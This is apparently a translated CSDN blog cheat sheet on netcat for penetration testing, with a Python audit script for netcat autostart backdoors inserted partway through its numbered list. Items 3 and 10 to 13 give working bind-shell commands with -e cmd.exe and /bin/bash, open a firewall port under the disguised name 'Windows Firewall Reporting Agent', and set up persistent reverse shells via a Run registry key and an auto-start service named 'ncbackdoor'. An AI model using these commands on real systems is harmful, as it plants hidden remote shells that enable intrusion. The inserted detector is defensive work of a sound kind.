1. Install netcat:
wget http://osdn.dl.sourceforge.net/sourceforge/netcat/netcat-0.7.1.tar.gz
tar -xzf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure
make
make install
2. Command format for the two modes of operation:
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
3. The dangerous -e option (runs a program when a connection arrives):
nc -l -p 123456 -e cmd.exe (Windows)
nc -l -p 12345 -e /bin/bash (Linux)
4. -g and -G: configure nc to use source routing
The –g and –G options allow you to configure Netcat to use source routing. In source routing
5. -L: keep listening, restarting the process after each connection
nc -l -p 12345 -e cmd.exe -L
6. -p: specify the listening port
nc -l -p 12345
7. Port scanning:
nc [-options] hostname [ports]
8. Receiving and sending a file (the listener writes its input to a file, the client reads a file on stdin):
nc -l -p 12345 > textfile
nc 192.168.1.4 12345 < textfile
9. Redirect connections to any port to the nc listening port (iptables NAT rule):
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 1:65535 -j REDIRECT --to-port 1234
10. Turn on Windows Firewall with exceptions mode enabled:
netsh firewall set opmode mode=enable exceptions=enable profile=all
11. Add a firewall rule that opens the port:
netsh firewall add portopening TCP 12345 "Windows Firewall Reporting Agent" enable all
12. Modify the registry so nc runs automatically (Run key):
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.11 12345 -e cmd.exe"
13. Create a Windows service with the sc command:
sc create ncbackdoor binPath= "cmd /K start c:\nc.exe -d 192.168.1.70 1111 -e cmd.exe" start= auto error= ignore
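A defender-side check for the two persistence mechanisms above (items 12 and 13). This is an added example, not code from the original post: it parses the text output of `reg query` for the HKLM Run key and `sc qc` for a service, and flags any start-up command that launches a netcat binary, especially with -e/-c (execute a shell on connect), a hard-coded remote IP, or the -L/-d flags. The `reg query` and `sc qc` output below is constructed for the demonstration; its hostile entries are modelled on the post's own commands, the benign entries are made up for contrast.

```python
"""Audit Windows autostart entries for netcat-style shell backdoors.

Added example: parses constructed `reg query` / `sc qc` output and flags
commands that launch netcat with -e/-c, a remote IP, or -L/-d.
"""
import re

# Constructed sample of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
# (one hostile entry modelled on the post, two benign entries for contrast).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    nc    REG_SZ    c:\windows\nc.exe -d 192.168.1.11 12345 -e cmd.exe
    OneDrive    REG_SZ    "C:\Users\demo\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
"""

# Constructed sample of `sc qc ncbackdoor`, modelled on the service the post creates.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ncbackdoor
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : cmd /K start c:\nc.exe -d 192.168.1.70 1111 -e cmd.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ncbackdoor
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# A netcat binary name appearing as a path component or a bare token.
NETCAT_BINARY = re.compile(
    r"(?:^|[\\/\s\"'])(?:nc|nc64|ncat|netcat)(?:\.exe)?(?=[\s\"']|$)", re.IGNORECASE)
# -e / -c (possibly clustered, e.g. -Le) followed by a shell interpreter.
EXEC_SHELL = re.compile(
    r"(?:^|\s)-[A-Za-z]*[ec]\s+(?:\S*\\)?(?:cmd(?:\.exe)?|powershell(?:\.exe)?|/bin/\w*sh)",
    re.IGNORECASE)
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def parse_run_entries(reg_output):
    """Return (value_name, command) pairs from `reg query ...\\Run` output.

    Value names containing spaces are not handled by this simple split; a
    production tool should read the key through the registry API instead.
    """
    entries = []
    for line in reg_output.splitlines():
        m = re.match(r"^\s+(\S+)\s+REG_\w+\s+(.*\S)\s*$", line)
        if m:
            entries.append((m.group(1), m.group(2)))
    return entries


def parse_service_config(sc_output):
    """Return (service_name, binary_path) from `sc qc` output, or None."""
    name = binpath = None
    for line in sc_output.splitlines():
        label, sep, value = line.partition(":")
        if not sep:
            continue
        label = label.strip()
        if label == "SERVICE_NAME":
            name = value.strip()
        elif label == "BINARY_PATH_NAME":
            binpath = value.strip()
    return (name, binpath) if name and binpath else None


def assess_command(command):
    """List the reasons a start-up command looks like a netcat backdoor.

    An empty list means no netcat indicator was found.
    """
    reasons = []
    if not NETCAT_BINARY.search(command):
        return reasons
    reasons.append("launches a netcat binary")
    if EXEC_SHELL.search(command):
        reasons.append("-e/-c executes a shell on connect")
    if IPV4.search(command):
        reasons.append("hard-coded remote IP (reverse shell)")
    if re.search(r"(?:^|\s)-[A-Za-z]*L", command):
        reasons.append("-L re-listens after each connection")
    if re.search(r"(?:^|\s)-[A-Za-z]*d(?:\s|$)", command):
        reasons.append("-d detaches from the console (runs hidden)")
    return reasons


def audit_autostarts(reg_output, sc_outputs):
    """Combine the Run-key and service checks into a list of findings."""
    findings = []
    for name, command in parse_run_entries(reg_output):
        reasons = assess_command(command)
        if reasons:
            findings.append({"source": "HKLM Run key", "name": name,
                             "command": command, "reasons": reasons})
    for sc_output in sc_outputs:
        parsed = parse_service_config(sc_output)
        if parsed:
            name, command = parsed
            reasons = assess_command(command)
            if reasons:
                findings.append({"source": "service", "name": name,
                                 "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_autostarts(SAMPLE_REG_QUERY, [SAMPLE_SC_QC]):
        print(f"[{f['source']}] {f['name']}: {f['command']}")
        for r in f["reasons"]:
            print("    -", r)
```

On a live host the same functions take the output of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` and of `sc qc <name>` for each service listed by `sc query`; the regexes are heuristics (a renamed binary defeats the name match), so they complement rather than replace process-creation and network logging.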
14. Basic file transfer setup (receiving side writes what it gets to a file):
nc -l -p 4444 > /test/outfile.txt
15. Timing the transfer with pv:
cat test.txt | pv -bt | nc 192.168.1.11 4444
Sample pv output: 199MB 0:00:19
That's all for now; friends who need penetration testing material are welcome to get in touch and learn together!! Haha
Source: CSDN
Author: qq,2411772106
Link: https://blog.csdn.net/weixin_44212888/article/details/103686274